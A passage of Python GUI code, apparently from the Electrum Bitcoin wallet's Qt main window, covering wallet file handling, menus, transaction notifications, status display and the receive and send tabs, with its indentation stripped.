filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are all reserved keywords in macOS using this as work around
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://electrum.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().host
self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(self, version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
total_amount += v
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000, num_zeros=self.num_zeros) + ' sat/byte'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
return decimal_point_to_base_unit_name(self.decimal_point)
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_history', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Bitcoin address where the payment should be received. Note that each payment request uses a different Bitcoin address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
_('The bitcoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
extra_query_params = {}
if req.get('time'):
extra_query_params['time'] = str(int(req.get('time')))
if req.get('exp'):
extra_query_params['exp'] = str(int(req.get('exp')))
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
extra_query_params['name'] = req['name']
extra_query_params['sig'] = sig
uri = util.create_bip21_uri(addr, amount, message, extra_query_params=extra_query_params)
return str(uri)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(repr(e))
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req, self.config)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + repr(e))
else:
self.sign_payment_request(addr)
self.save_request_button.setEnabled(False)
finally:
self.request_list.update()
self.address_list.update()
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
try:
addr = self.wallet.get_receiving_address() or ''
except InternalAddressCorruption as e:
self.show_error(str(e))
addr = ''
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_bip21_uri(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
if self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def set_feerounding_text(self, num_satoshis_added):
self.feerounding_text = (_('Additional {} satoshis are going to be added.')
.format(num_satoshis_added))
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = FromList(self, self.from_list_menu)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(self.amount_e.width())
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 4, 4)
msg = _('Bitcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
if self.config.use_mempool_fees():
self.config.set_key('depth_level', pos, False)
else:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
fee_rate = Decimal(fee_rate)
self.feerate_e.setAmount(quantize_feerate(fee_rate / 1000))
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
self.spend_max() if self.max_button.isChecked() else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(self.amount_e.width())
def on_fee_or_feerate(edit_changed, editing_finished):
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if edit_changed.get_amount() is None:
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(self.amount_e.width())
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 0)
self.feerate_e.setAmount(self.config.fee_per_byte())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (self.feerounding_text + '\n\n' +
_('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 satoshis might be lost due to this rounding.') + ' ' +
_("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
_('Also, dust is not kept as change, but added to the fee.') + '\n' +
_('Also, when batching RBF transactions, BIP 125 imposes a lower bound on the fee.'))
self.show_message(title=_('Fee rounding'), msg=text)
self.feerounding_icon = QPushButton(read_QIcon('info.png'), '')
self.feerounding_icon.setFixedWidth(round(2.2 * char_width_in_lineedit()))
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
vbox_feecontrol = QVBoxLayout()
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid.addLayout(vbox_feecontrol, 5, 1, 1, -1)
if not self.config.get('show_fee', False):
self.fee_adv_controls.setVisible(False)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _("Not enough funds")
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += " ({} {} {})".format(
self.format_amount(c + u + x).strip(), self.base_unit(), _("are frozen")
)
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
